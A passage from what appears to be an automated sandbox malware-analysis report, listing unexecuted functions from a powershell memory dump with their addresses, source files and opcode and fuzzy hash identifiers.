                                                                                                                                                    • Opcode ID: 73bab693c9d1c6ef4056b2574e6bdbcdc99e5403d4adf62c4e9a3baaffb8236b
                                                                                                                                                    • Instruction ID: 0131a395d140d96b53ef27fe8c0d1fbea5fbcd4ca90af3bde17d44cbdf591bf6
                                                                                                                                                    • Opcode Fuzzy Hash: 73bab693c9d1c6ef4056b2574e6bdbcdc99e5403d4adf62c4e9a3baaffb8236b
                                                                                                                                                    • Instruction Fuzzy Hash: F0813821A0EBC65FE35AA77C18661B5BFE1EF56160F0C06FBC089C71E3DA185846C356

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00007FF848E8D77C Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.2266698059.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 0-2909332022
                                                                                                                                                    • Opcode ID: 7d52aa3e073154732f6a59fa232a29f5620b5bc822822dccd6e7e7316f9260cd
                                                                                                                                                    • Instruction ID: a320fc91cfafd89f81690d799f15bd911f43414a7c5d387de9ded5e54a7c2ba2
                                                                                                                                                    • Opcode Fuzzy Hash: 7d52aa3e073154732f6a59fa232a29f5620b5bc822822dccd6e7e7316f9260cd
                                                                                                                                                    • Instruction Fuzzy Hash: 1B42E430A1CA894FEBA8EF1888457A877E0FF55380F5441BDD84DCB292DB78E946C785
                                                                                                                                                    Function 00007FF848E8D805 Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.2266698059.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 0-2909332022
                                                                                                                                                    • Opcode ID: 7a47c72270bd52a25477f3daa3a200563fcbe475c3d2c7c050d2b793b3bbafc6
                                                                                                                                                    • Instruction ID: 956653ccf951665a0d484d2b750a701b90e0f2af5ce72757d1431a0ce3680b61
                                                                                                                                                    • Opcode Fuzzy Hash: 7a47c72270bd52a25477f3daa3a200563fcbe475c3d2c7c050d2b793b3bbafc6
                                                                                                                                                    • Instruction Fuzzy Hash: E012AF30A1CA4A8FEBA8EF18C845BA977E0FF58380F544179D84EC7292DF74E9458785